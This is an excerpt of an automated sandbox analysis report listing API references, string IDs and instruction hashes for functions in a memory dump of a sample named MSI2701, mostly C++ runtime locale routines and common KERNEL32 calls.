• String ID: 2N$TGN$csm
• API String ID: 1170836740-188400833
APIs
• __EH_prolog3_GS.LIBCMT ref: 004D855C
• _Maklocstr.LIBCPMT ref: 004D85C5
• _Maklocstr.LIBCPMT ref: 004D85D7
• _Maklocchr.LIBCPMT ref: 004D85EF
• _Maklocchr.LIBCPMT ref: 004D85FF
• _Getvals.LIBCPMT ref: 004D8621
  • Part of subcall function 004D1CD4: _Maklocchr.LIBCPMT ref: 004D1D03
  • Part of subcall function 004D1CD4: _Maklocchr.LIBCPMT ref: 004D1D19
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
• String ID: false$true
• API String ID: 3549167292-2658103896
APIs
• std::locale::_Init.LIBCPMT ref: 004C9763
  • Part of subcall function 004D0C94: __EH_prolog3.LIBCMT ref: 004D0C9B
  • Part of subcall function 004D0C94: std::_Lockit::_Lockit.LIBCPMT ref: 004D0CA6
  • Part of subcall function 004D0C94: std::locale::_Setgloballocale.LIBCPMT ref: 004D0CC1
  • Part of subcall function 004D0C94: std::_Lockit::~_Lockit.LIBCPMT ref: 004D0D17
• std::_Lockit::_Lockit.LIBCPMT ref: 004C978A
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004C97F0
• std::locale::_Locimp::_Makeloc.LIBCPMT ref: 004C984A
  • Part of subcall function 004CF57A: __EH_prolog3.LIBCMT ref: 004CF581
  • Part of subcall function 004CF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004CF5C8
  • Part of subcall function 004CF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004CF620
  • Part of subcall function 004CF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004CF654
  • Part of subcall function 004CF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004CF6A8
• LocalFree.KERNEL32(00000000,00000000,?,005154B1,00000000), ref: 004C99BF
• __cftoe.LIBCMT ref: 004C9B0B
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$FreeInitLocalLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                            • API String ID: 3103716676-1405518554
                                                                                                                                                            • Opcode ID: c3dad8abdb8fb90d52549c9bc15e9c0c75ce1a942f5b1cf6ef48acb44ae767ca
                                                                                                                                                            • Instruction ID: b783c63dd01fa4e2d686aec28027e50ebf084f5459a4e85710e44a1c973c2b89
                                                                                                                                                            • Opcode Fuzzy Hash: c3dad8abdb8fb90d52549c9bc15e9c0c75ce1a942f5b1cf6ef48acb44ae767ca
                                                                                                                                                            • Instruction Fuzzy Hash: DEF18E75901248EFDB10DFA8C984BAEBBB5FF09304F14416EE405A7381E7799E04CBA5
                                                                                                                                                            APIs
                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,004F7632,00000021,FlsSetValue,0050BD58,0050BD60,?,?,004F5955,00000006,000000FF,?,004E6CE7,00000000,A8O), ref: 004F73BC
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                            • String ID: A8O$api-ms-$ext-ms-
                                                                                                                                                            • API String ID: 3664257935-2336601795
                                                                                                                                                            • Opcode ID: d73808d4c41bb9d9778e8718d092e1552271ec57e2daf58e0b3c1c0e2f022935
                                                                                                                                                            • Instruction ID: 76d29c6387d908b22e153dd8281745674e5061527817b001c7481ca0053fa9eb
                                                                                                                                                            • Opcode Fuzzy Hash: d73808d4c41bb9d9778e8718d092e1552271ec57e2daf58e0b3c1c0e2f022935
                                                                                                                                                            • Instruction Fuzzy Hash: DE21F336A09219BBDB219B65AC41A6F3BA9DF55760F240212FE01A7380D77CFD00E6A5
                                                                                                                                                            APIs
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,40000022,C7C71CC4,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004C4154
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,3FFFFFFF,C7C71CC4,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004C4177
                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004C4217
                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,C7C71CC4,?,?,?), ref: 004C42D2
                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,C7C71CC4,?,?,?), ref: 004C42F3
                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,C7C71CC4,?,?,?), ref: 004C4326
                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,C7C71CC4,?,?,?), ref: 004C4337
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C7C71CC4,?,?,?), ref: 004C4355
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C7C71CC4,?,?,?), ref: 004C4371
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1424318461-0
                                                                                                                                                            • Opcode ID: ba2e56f3c3b1e6ba26efa980c8b50e7ac0e0e9c677539220ff09e91360301725
                                                                                                                                                            • Instruction ID: 8bcb7dc32a745485807767234188037183ab2e129cc39d807bd9d6d4cc2c92d0
                                                                                                                                                            • Opcode Fuzzy Hash: ba2e56f3c3b1e6ba26efa980c8b50e7ac0e0e9c677539220ff09e91360301725
                                                                                                                                                            • Instruction Fuzzy Hash: CF81B175E002059FDB14CFA8D995FAEBBB4FB88310F24422EE925A7390D734AD40CB94
                                                                                                                                                            APIs
                                                                                                                                                            • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 004E26F8
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 004E2786
                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004E27B0
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004E27F8
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 004E2812
                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004E2838
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004E2875
                                                                                                                                                            • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004E2892
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3603178046-0
                                                                                                                                                            • Opcode ID: 9abf74ad4debbc6228805a8857db108069867252505672036476c163ab3a80d7
                                                                                                                                                            • Instruction ID: b322b5ec726141aa73199adbdde2fd72eb80d2f8677474ff7a3448a6ecddb433
                                                                                                                                                            • Opcode Fuzzy Hash: 9abf74ad4debbc6228805a8857db108069867252505672036476c163ab3a80d7
                                                                                                                                                            • Instruction Fuzzy Hash: DF71C575900289ABDF219F66CE45AEF7BBDBF45312F18025BE904A7250D7B9C900CB68
                                                                                                                                                            APIs
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 004E21A3
                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004E21CF
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 004E220E
                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004E222B
                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004E226A
                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004E2287
                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004E22C9
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004E22EC
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2040435927-0
                                                                                                                                                            • Opcode ID: 62cf5803dc803e9df7e9830b92356ba6683ff4f20f8bba978771d4452a7fe932
                                                                                                                                                            • Instruction ID: 40dd0acb2b88a5d2e9a80ea4e744988d4bea97edbffbc5e450534dacb549a96a
                                                                                                                                                            • Opcode Fuzzy Hash: 62cf5803dc803e9df7e9830b92356ba6683ff4f20f8bba978771d4452a7fe932
                                                                                                                                                            • Instruction Fuzzy Hash: A651E37290028ABBEB204F66CD44FAF7BADFF04742F15415AFE01A6290D7B89D00DB64
                                                                                                                                                            APIs
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004C8657
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004C8679
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004C86A1
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000044,00000000,C7C71CC4,?,00000000), ref: 004C86F9
                                                                                                                                                            • __Getctype.LIBCPMT ref: 004C877B
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004C87E4
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004C880E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
• String ID:
• API String ID: 2372200979-0
• Opcode ID: 228dc56acc035fc238408c22da3ae5c9302f180b32a6038e48569a7b731611c3
• Instruction ID: f6fede9c006a5eb00357a74a53575bda780becbd645c452d4b54728dcb0c0f64
• Opcode Fuzzy Hash: 228dc56acc035fc238408c22da3ae5c9302f180b32a6038e48569a7b731611c3
• Instruction Fuzzy Hash: 0861CF75D00648DFDB51CF68C940BAEBBF0FB14314F24815ED845AB392EB38AA45CB95

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 004C92A0
• std::_Lockit::_Lockit.LIBCPMT ref: 004C92C2
• std::_Lockit::~_Lockit.LIBCPMT ref: 004C92EA
• LocalAlloc.KERNEL32(00000040,00000018,00000000,C7C71CC4,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004C9342
• __Getctype.LIBCPMT ref: 004C93BD
• std::_Facet_Register.LIBCPMT ref: 004C93F8
• std::_Lockit::~_Lockit.LIBCPMT ref: 004C9422
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
• String ID:
• API String ID: 2372200979-0
• Opcode ID: 809e96dd9c4fb2bfab303a1ded47f911b5a738a6d62fa4db07dec2862772d651
• Instruction ID: 166149e8933bd2f3a8394a8af6148ebb5db3270da9b17b86fe3d01837c2071b7
• Opcode Fuzzy Hash: 809e96dd9c4fb2bfab303a1ded47f911b5a738a6d62fa4db07dec2862772d651
• Instruction Fuzzy Hash: 7951CA74D04249EFCB11CF68C548B9EBBF0EB18704F24859EE801AB391D778AE05CB94

APIs
• GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 004C6FB7
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: ErrorLast
• String ID: <SQ$<SQ$<SQ$> returned:$Call to ShellExecute() for verb<$Last error=
• API String ID: 1452528299-1666677208
• Opcode ID: 1a56ad0e1ab9ea589fdb2ae7e6485027b48a0704642b99c260bff036f2cbd2e4
• Instruction ID: ffd8eca564a102f8f0504ea5c6ca3ec592156f212949c5a6c37b47d8722bfc95
• Opcode Fuzzy Hash: 1a56ad0e1ab9ea589fdb2ae7e6485027b48a0704642b99c260bff036f2cbd2e4
• Instruction Fuzzy Hash: 4921AF5DA10261C3DBB01F298400B7AA6E0AF54758F65086FD8C8D7390FABD8C828399

APIs
• __EH_prolog3.LIBCMT ref: 004CD883
• std::_Lockit::_Lockit.LIBCPMT ref: 004CD88D
  • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
  • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
• numpunct.LIBCPMT ref: 004CD8C7
• std::_Facet_Register.LIBCPMT ref: 004CD8DE
• std::_Lockit::~_Lockit.LIBCPMT ref: 004CD8FE
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
• String ID: 2N
• API String ID: 743221004-2395104290
• Opcode ID: c8a9f8b471f2f656245ac47006fe0a647c49a3d7a930973edf36bf572e2d3159
• Instruction ID: e8d74cd139970b5a8aa697ea7e8d3df25d68516ea3b8f40508e2a41efb8440de
• Opcode Fuzzy Hash: c8a9f8b471f2f656245ac47006fe0a647c49a3d7a930973edf36bf572e2d3159
• Instruction Fuzzy Hash: 0311A039D00215ABCB05AB619415BBE7761BF94714F24446FE4106B3D1CF789E058BA9

APIs
• __EH_prolog3.LIBCMT ref: 004D2301
• std::_Lockit::_Lockit.LIBCPMT ref: 004D230B
  • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
  • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
• codecvt.LIBCPMT ref: 004D2345
• std::_Facet_Register.LIBCPMT ref: 004D235C
• std::_Lockit::~_Lockit.LIBCPMT ref: 004D237C
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
• String ID: 2N
• API String ID: 712880209-2395104290
• Opcode ID: 9e14de3b48a56906e206382d7fdeaed8e79697a54f3405d804cefd46a6291fb7
• Instruction ID: b1f5216a9b9aa7ae259e43d48697fbb467eabf2a5daf4113eededbb24429e489
• Opcode Fuzzy Hash: 9e14de3b48a56906e206382d7fdeaed8e79697a54f3405d804cefd46a6291fb7
• Instruction Fuzzy Hash: 8101ED3580011A9BCB01AB61A815BBEB7B0BF90714F24040FF900AB391CF7C9E018BA9

APIs
• __EH_prolog3.LIBCMT ref: 004D2396
• std::_Lockit::_Lockit.LIBCPMT ref: 004D23A0
  • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
  • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
• codecvt.LIBCPMT ref: 004D23DA
• std::_Facet_Register.LIBCPMT ref: 004D23F1
• std::_Lockit::~_Lockit.LIBCPMT ref: 004D2411
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
• String ID: 2N
• API String ID: 712880209-2395104290
• Opcode ID: 28ea1aee4e05273e832bc6beac202a6f89f27a46fb310e688778b181cfe7f1d0
• Instruction ID: 628e5e794c76e97ce82be25a5998fa821cdce87cc9a7afb6ed83b273033e44e1
• Opcode Fuzzy Hash: 28ea1aee4e05273e832bc6beac202a6f89f27a46fb310e688778b181cfe7f1d0
• Instruction Fuzzy Hash: B6010035A0011A9BCB05EB618925BBE77B0BF90714F24044FE810A7392CFBC9E05CBA9

APIs
• __EH_prolog3.LIBCMT ref: 004D242B
• std::_Lockit::_Lockit.LIBCPMT ref: 004D2435
  • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
  • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
• collate.LIBCPMT ref: 004D246F
• std::_Facet_Register.LIBCPMT ref: 004D2486
• std::_Lockit::~_Lockit.LIBCPMT ref: 004D24A6
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
• String ID: 2N
• API String ID: 1007100420-2395104290
• Opcode ID: 5419063eb3e6199764bbc1828a0b2019a4c001dc9dfad6388a956b1ca387edc9
• Instruction ID: 10ffdef586a934e7500ba6eabb73487d0ed9c19d256c06d07d9babb7fc432f1e
• Opcode Fuzzy Hash: 5419063eb3e6199764bbc1828a0b2019a4c001dc9dfad6388a956b1ca387edc9
• Instruction Fuzzy Hash: D101AD75900119ABCB05AB61D925BBE7BB0BF94724F24044FE9006B391DFB89E05CBA9

APIs
• __EH_prolog3.LIBCMT ref: 004D24C0
• std::_Lockit::_Lockit.LIBCPMT ref: 004D24CA
  • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
  • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
• collate.LIBCPMT ref: 004D2504
• std::_Facet_Register.LIBCPMT ref: 004D251B
• std::_Lockit::~_Lockit.LIBCPMT ref: 004D253B
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 1007100420-2395104290
                                                                                                                                                            • Opcode ID: 95a76fa284abd048fbbed08e9a14cde629a34c9286c4831b22f88997c16bb7cd
                                                                                                                                                            • Instruction ID: 8c5426264f3af8d6fd3ab26ed022eaa6682f31c6797fbcc3b9edfb44f7686c2f
                                                                                                                                                            • Opcode Fuzzy Hash: 95a76fa284abd048fbbed08e9a14cde629a34c9286c4831b22f88997c16bb7cd
                                                                                                                                                            • Instruction Fuzzy Hash: CE010435900115EBCB05EB65D825BBE77B0BF94715F24044FE4006B391CF789E018B99
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2555
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D255F
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • ctype.LIBCPMT ref: 004D2599
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D25B0
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D25D0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 83828444-2395104290
                                                                                                                                                            • Opcode ID: f1cff204904e1cf6aaa0a609dda34447d74cbaa766fcd6b2c11a82152ae8046d
                                                                                                                                                            • Instruction ID: 465c7d5eec57227d795492391f4ee895e0d0570d2a94b08a171199ea6426d818
                                                                                                                                                            • Opcode Fuzzy Hash: f1cff204904e1cf6aaa0a609dda34447d74cbaa766fcd6b2c11a82152ae8046d
                                                                                                                                                            • Instruction Fuzzy Hash: AB01ED35900119EBCB01EB619825BBE77B0BF94314F24040FE400AB392DF789E048BA9
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D25EA
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D25F4
